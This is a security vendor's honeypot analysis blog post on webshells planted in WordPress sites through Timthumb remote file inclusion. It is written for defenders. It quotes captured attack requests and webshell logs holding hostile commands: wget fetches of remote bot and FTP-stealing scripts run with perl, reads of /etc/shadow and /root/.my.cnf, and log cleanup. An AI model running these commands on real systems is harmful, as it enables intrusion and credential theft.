Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

[Honeypot Alert] Inside the Attacker's Toolbox: Webshell Usage Logging

In a previous blog post, we discussed the common lifecycle of web server botnet recruitment. While installing perl IRC botnet scripts is a common tactic for post-exploitation, it is by no means the only method used to interact with or control compromised websites. This blog post will outline how attacker utilize webshell/backdoor webpages and the audit log file often left behind.

Initial Compromise

The initial attack vector most often used is either Remote File Inclusion (RFI) or WordPress Timthumb plugin PHP Code Execution. Here are example attacks which were captured today in our web honeypots:

200.151.187.18 - - [19/Jun/2013:00:54:20 +0200] "GET /wp-content/themes/Apz.v1.0.2/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:03 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:11:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:12:43 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:06 +0200] "GET /wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:14:08 +0200] "GET /logs/wp-content/themes/announcement/functions/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:15:34 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:22:49 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:24:33 +0200] "GET /wp-content/themes/Apz/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:03:29:47 +0200] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:04:10:54 +0200] "GET /wp-content/themes/TheSource/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:03 +0200] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:05:04 +0200] "GET /logs//wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:09:55 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:05:18:29 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 348 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:11 +0200] "GET //wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:07:13:12 +0200] "GET /logs//wp-content/themes/versatile?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:25:15 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:32:33 +0200] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:33:48 +0200] "GET //wp-content/themes/groovyvideo/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:41:43 +0200] "GET //wp-content/themes/yamidoo/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:08:42:34 +0900] "GET /wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 243
200.151.187.18 - - [19/Jun/2013:08:58:39 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:01:47 +0200] "GET //wp-content/themes/TheCorporation/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:09:20:11 +0200] "GET //wp-content/themes/EspOptimizePress/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:03:53 +0200] "GET //wp-content/themes/corporattica/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:14:38 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:20:37 +0200] "GET //wp-content/themes/digitalfarm/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:24:49 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:28:17 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:28:51 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:30:22 +0900] "GET /p-content/themes/OptimizePress/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 237
200.151.187.18 - - [19/Jun/2013:10:34:50 +0200] "GET //wp-content/themes/bigeasy/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:37 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:40:59 +0200] "GET //wp-content/themes/ibuze/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:41:20 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:09 +0200] "GET //wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:43:10 +0200] "GET /logs//wp-content/themes/duotive-?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:41 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:10:59:42 +0200] "GET /logs//wp-content/themes/welcome_inn/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:11:26:11 +0200] "GET //wp-content/themes/premiumnews/thumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
200.151.187.18 - - [19/Jun/2013:12:24:58 +0900] "GET //wp-content/themes/classifiedstheme/thumbs/?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 249
200.151.187.18 - - [19/Jun/2013:14:20:43 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:14:26:34 +0900] "GET /wp-content/themes/wpuniversity/scripts/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 257
200.151.187.18 - - [19/Jun/2013:15:33:15 +0900] "GET //wp-content/themes/Galleria/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:16:02:13 +0900] "GET //wp-content/themes/MyResume/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 246
200.151.187.18 - - [19/Jun/2013:17:15:16 +0900] "GET //wp-content/themes/eVidTheme/timthumb.php?src=http://flickr.com.golfpops.com/thumbid.php HTTP/1.1" 404 247

In all of these examples, the attacker is attempting to trick the PHP application into downloading/executing the remote file - hxxp://flickr.com.golfpops.com/thumbid.php.

Post-Compromise Actions

This webshell has functionality similar to the following redacted example -

11578_bff0f954-03b6-47cf-b7db-49d90d3a16eb
This webshell provides extensive funcationality for the attacker. In this screenshot, the attacker is using the "View File" component. The resulting URL looks likes this -

http://VICTIM_SITE/wp-includes/theme-compat/wp-targz.php?x=f&f=wp-config.php&d=%2Fhome%2Ffoo%2Fpublic_html &cd=2&hl=en&ct=clnk&gl=us

The "f" parameter is the file that the attacker is now viewing through this webshell. As you can see, the attacker is able to inspect the wp-config.php file contents which disclose sensitive data such as the DB username and passwords. This type of data leakage could potentially lead to deeper compromise. Other examples of actions include:

12245_e1726b45-742f-4a91-89ff-0a6cdbe5a4d2

Attackers can even edit existing files to try and remove their tracks from logs. This screenshot shows an example of editing the Apache access_log file:

8157_1a156e95-0ee7-4b5e-81aa-e3d6eda6d5dd

Webshell Usage Logging

While reviewing these webshell files, we found that many include audit logging as part of the backdoor. For example, let's look at the source of that thumbid.php script again:

11025_a4a84ce6-285d-4182-8a4c-18e82a5caa37
This section of PHP code creates audit audit log file called "x.txt" in the document root directory of the website and it logs all interactions by web clients with this webshell. Here are some examples that SpiderLabs has obtained which shows past commands used.

Example 1:

Day  : Mon, 03 Jun 2013 22:05:39 -0300IP  : 188.83.6.147Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.phpLast Command : id_____________________________________________________________________________________Day  : Mon, 03 Jun 2013 22:05:52 -0300IP  : 188.83.6.147Browser  : Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0Url  : /wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/03e91508ab1a6811d2e16df4081c4b36.phpLast Command : wget http://mail.ebsuccess.com/accounts/inc/bot1.txt; perl bot1.txt; rm -rf bot1.txt_____________________________________________________________________________________

These entries show that the attacker first ran the "id" command to see what user the webshell was running as. She then downloaded a file, executed it and then removed the file to cleanup.

Example 2:

Day     : Wed, 05 Jun 2013 19:36:43 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:37:54 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:38:19 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/php/c100.gif ; mv c100.gif fantastico.php ; chmod +x *.php ; ls -alF_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:40:18 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : cat .htaccess_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:40:47 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp* ; perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:41:24 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : hostname ; /sbin/ifconfig | grep inet ; cat /etc/passwd /etc/shadow /root/.my.cnf /etc/group ; ls -alF /etc/passwd /etc/shadow /root/.my.cnf /etc/group_____________________________________________________________________________________
Day     : Wed, 05 Jun 2013 19:42:02 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : netstat -an | grep -i listen_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:46:06 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : rm -f ftp ftp.txt ; ls -al_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:47:16 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : cat /home/XXXX/public_html/blog/configuration.php_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:47:56 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : find `pwd` -type f -name \"*thumb*.php\" -exec ls -alF {} \\;_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 19:59:54 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : wget http://193.180.115.30/~online/ftp ; ls -alF ftp*_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:00:03 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:00:56 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:01:05 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:03:29 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : edit_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:04:02 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:04:19 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:05:31 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:06:57 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:07:10 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:09:34 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:10:01 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:10:08 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:11:08 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:11:12 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:12:34 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:12:46 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:17:01 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : save_file_____________________________________________________________________________________Day     : Wed, 05 Jun 2013 20:17:16 -0500IP      : 67.202.92.84Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : perl ftp_____________________________________________________________________________________Day     : Thu, 06 Jun 2013 13:30:30 -0500IP      : 109.167.225.109Browser : Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0Url     : /wp-master.phpLast Command : rm -f ftp ftp.txt ; ls -alF_____________________________________________________________________________________

This particular attacker executed many commands as you can see. The most notable of which was to download and run this program -

9602_62b77213-8c7c-4242-afa2-d3230d76bcbb
The "confspy.pl" script will search home directories for users and attempt to steal their FTP credentials. Knowing that a tool like this has been run on your system widens the scope of compromise and would require your users to change all passwords to help prevent the attacker from re-gaining access even if you were to patch the original Timthumb attack vector.

Takeaways

After analyzing these types of webshell backdoors for quite some time, it is clear that the majority of these attackers are simply re-using webshells written by others. They simply modify the page TITLE or color scheme to take some cosmetic ownership of the code. This is one of the main reasons why this audit logging code persists in these webshells. In addition to the more common audit log name of "x.txt" you should also look for "logx.txt" as that has been see quite frequently as well. Hopefully this information will help you if you find that your website has been compromised and you are trying to identify what actions the attacker executed.

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo